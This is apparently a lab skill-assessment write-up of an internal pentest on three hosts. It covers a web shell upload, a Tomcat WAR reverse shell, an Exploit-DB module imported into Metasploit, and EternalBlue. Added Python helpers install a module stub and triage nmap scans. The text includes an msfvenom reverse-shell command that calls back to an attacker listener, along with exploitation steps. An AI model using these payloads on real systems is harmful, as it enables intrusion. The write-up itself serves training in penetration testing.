Skill Assessment

TL;DR:

With this skill assessment, I had a very bad time using my own attacking machine instead of their Pwnbox. Everything worked fine with the Pwnbox, but the latency...

We are already given a foothold on the internal network, so this is an internal pentest of their web apps.

The first (Windows) host has two file upload vulnerabilities: one through a WAR file deployed via the Tomcat manager, for which we must craft our own payload with msfvenom, and the other a simple web shell upload.

The second host runs Linux and has a known CVE, which we exploit with Metasploit after importing the exploit from Exploit-DB.

The third host is low-hanging fruit: EternalBlue (MS17-010).

HOST 1

Internal network

Checking status.inlanefreight.local on port 80, we find this website:

Obviously there is a file upload field here. Before checking this website, though, I had also checked status.inlanefreight.local on port 8080 and found another web portal, for configuring apps on an Apache Tomcat server.

Apache Tomcat config portal

For now we'll stick with the first site and go with the Antak web shell (the ASPX web shell from the Nishang project, which executes PowerShell), since it's a Windows target: make a copy of it in a directory of our choice and then modify the username and password hard-coded in it before uploading.

Once the web shell is uploaded, here are some ways of getting the hostname and share name from it:

PS> hostname                                           # simplest: the hostname utility
PS> [System.Net.Dns]::GetHostName()                    # .NET call, no external binary needed
PS> (Get-WmiObject -Class Win32_ComputerSystem).Name   # WMI query; the same object also exposes the Domain property

Now let's try another way into the target machine, since we have the Tomcat manager portal and the Tomcat credentials provided on our desktop:

At this point I tested Metasploit with the following commands:

msfconsole> search type:exploit platform:windows tomcat   # keyword filters; see `help search` for the full keyword list
msfconsole> use exploit/multi/http/tomcat_mgr_upload      # Didn't work
msfconsole> use exploit/multi/http/tomcat_mgr_deploy      # Didn't work

With both modules failing, a bit of searching showed that what the manager gives us is not a web shell but a reverse shell: the manager deploys WAR archives, so we need a WAR containing a reverse-shell JSP for the Tomcat instance on the target, which we craft ourselves with msfvenom.

# LHOST/LPORT point at our listener; -f war wraps the JSP in a deployable archive
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9443 -f war > shell.war

After setting up a listener on port 9443, uploading and deploying the WAR file through the manager, and browsing to the deployed application to trigger the JSP, we get a successful hit back:

HOST 2

The second host runs a blog and is largely self-explanatory: the foothold machine already gives us intel about a CVE, an exploit ready for use, and even admin login credentials. Free win.

After a bit of research it became clear that the point of this host is importing an Exploit-DB exploit into Metasploit, since this exploit isn't shipped with the framework (or at least isn't loaded) yet.

I ran into this blog post, which explained it well:

After setting the VHOST, RHOST, RPORT, USERNAME and USERPASSWORD options of the module, we get our beloved shell on the target host:
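Importing the Exploit-DB module is the part most people get wrong (wrong directory, numeric file name, no reload), so here is an added example, not code from the write-up or from Metasploit, that drops a module into the user module tree Metasploit scans (~/.msf4/modules) and derives the name you pass to `use`. The module stub, the `blog_rce` name and the `linux/http` sub-path are constructed placeholders; after copying, run `reload_all` in msfconsole (or restart it) and the module appears.

```python
"""Install an Exploit-DB Metasploit module into ~/.msf4/modules so msfconsole can load it.

Added example, not the write-up's or Metasploit's code. The Ruby stub below is a
constructed placeholder, not a real exploit; paths follow Metasploit's module layout.
"""
import re
import shutil
import tempfile
from pathlib import Path

# msfconsole loads modules from this tree at startup and on `reload_all`.
MSF_USER_MODULES = Path.home() / ".msf4" / "modules"

# Constructed stub of an Exploit-DB Metasploit module (does nothing; for the demo only).
SAMPLE_MODULE = """##
# Constructed stub, not a real exploit
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info, 'Name' => 'Constructed blog RCE stub'))
  end
end
"""

TYPE_DIR = {"Exploit": "exploits", "Auxiliary": "auxiliary", "Post": "post"}
TYPE_PREFIX = {"exploits": "exploit", "auxiliary": "auxiliary", "post": "post"}


def module_type_dir(rb_source):
    """Infer the module type from the Msf class it inherits from, which decides
    the top-level directory (exploits/, auxiliary/ or post/) it must live in."""
    m = re.search(r"class\s+MetasploitModule\s*<\s*Msf::(Exploit|Auxiliary|Post)", rb_source)
    if not m:
        raise ValueError("not a Metasploit module: no 'class MetasploitModule < Msf::...' line")
    return TYPE_DIR[m.group(1)]


def install_module(src, subpath, root=MSF_USER_MODULES):
    """Copy src to root/<type>/<subpath>/<name>.rb and return the name for `use`.
    The file name becomes the module name, so rename searchsploit's NNNNN.rb to
    something descriptive first; the extension must be .rb."""
    src = Path(src)
    if src.suffix != ".rb":
        raise ValueError("module files must end in .rb")
    type_dir = module_type_dir(src.read_text())
    dest_dir = Path(root) / type_dir / subpath.strip("/")
    dest_dir.mkdir(parents=True, exist_ok=True)
    shutil.copyfile(src, dest_dir / src.name)
    return f"{TYPE_PREFIX[type_dir]}/{subpath.strip('/')}/{src.stem}"


def demo():
    """Run the install against a temporary module root and report the result."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / "blog_rce.rb"          # renamed from the Exploit-DB NNNNN.rb
        src.write_text(SAMPLE_MODULE)
        root = Path(tmp) / "msf4" / "modules"   # stand-in for ~/.msf4/modules
        name = install_module(src, "linux/http", root=root)
        installed = (root / "exploits" / "linux" / "http" / "blog_rce.rb").is_file()
        return name, installed


if __name__ == "__main__":
    print(demo())   # then in msfconsole: reload_all ; use exploit/linux/http/blog_rce
```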

HOST 3

Here are the nmap results:

As mentioned here, when we see Windows Server 2016, 2008, etc., we should think of the one and only EternalBlue (MS17-010), which the nmap scan confirms:

Not much thought needed here: Metasploit is the way to go, and just as in the Exploiting Windows part, we easily get a shell on the final target host!
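The "old Windows server, think EternalBlue" heuristic and the nmap confirmation are two different levels of evidence, so here is an added example (not from the write-up) that triages nmap normal output and separates hosts that merely look like candidates (an old Windows version in the banner or smb-os-discovery) from hosts where the smb-vuln-ms17-010 script actually reports State: VULNERABLE. The scan text is constructed and the addresses and names are placeholders, not the write-up's real scan.

```python
"""Triage nmap output for EternalBlue (MS17-010) candidates vs confirmed hosts.

Added example, not the write-up's code. SAMPLE_NMAP is constructed; it mimics the
layout of `nmap -sV --script smb-vuln-ms17-010,smb-os-discovery` normal output.
"""
import re

SAMPLE_NMAP = """\
Nmap scan report for 172.16.1.13
Host is up (0.021s latency).
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: WEB03
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH

Nmap scan report for 172.16.1.14
Host is up (0.019s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms17-010: Could not connect to 'IPC$'
"""

# Versions old enough to have shipped SMBv1 and therefore worth a closer look.
OLD_WINDOWS = re.compile(r"Windows (?:Server )?(?:2008|2012|2016|7|8\.1|Vista|XP)\b")
# An NSE script header is "| name:" (multi-line) or "|_name:" (single line); content
# lines are indented by three or more spaces after the bar, so they don't match.
SCRIPT_HEADER = re.compile(r"^\|_?\s?([\w-]+):")
CANDIDATE = "candidate"
CONFIRMED = "confirmed"


def split_hosts(nmap_text):
    """Yield (address, block) for each 'Nmap scan report for' section."""
    parts = re.split(r"^Nmap scan report for (\S+)\n", nmap_text, flags=re.M)
    for i in range(1, len(parts) - 1, 2):   # parts = ['', addr1, body1, addr2, body2, ...]
        yield parts[i], parts[i + 1]


def ms17_010_state(block):
    """Return the 'State:' value inside the smb-vuln-ms17-010 section, or None if the
    script did not run, could not connect, or reported nothing."""
    in_section = False
    for line in block.splitlines():
        hdr = SCRIPT_HEADER.match(line)
        if hdr:
            in_section = hdr.group(1) == "smb-vuln-ms17-010"
            continue
        if not line.startswith("|"):
            in_section = False
        if in_section:
            m = re.search(r"State:\s*(\w+)", line)
            if m:
                return m.group(1)
    return None


def triage(nmap_text):
    """Map address -> 'confirmed' (NSE says VULNERABLE), 'candidate' (old Windows only) or None."""
    results = {}
    for addr, block in split_hosts(nmap_text):
        if ms17_010_state(block) == "VULNERABLE":
            results[addr] = CONFIRMED
        elif OLD_WINDOWS.search(block):
            results[addr] = CANDIDATE
        else:
            results[addr] = None
    return results


if __name__ == "__main__":
    for addr, verdict in triage(SAMPLE_NMAP).items():
        print(addr, verdict)
```

Only the confirmed hosts go straight to exploit/windows/smb/ms17_010_eternalblue; a candidate with no script result (here the IPC$ failure) needs the check re-run, or the module's own `check`, before assuming it is exploitable.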
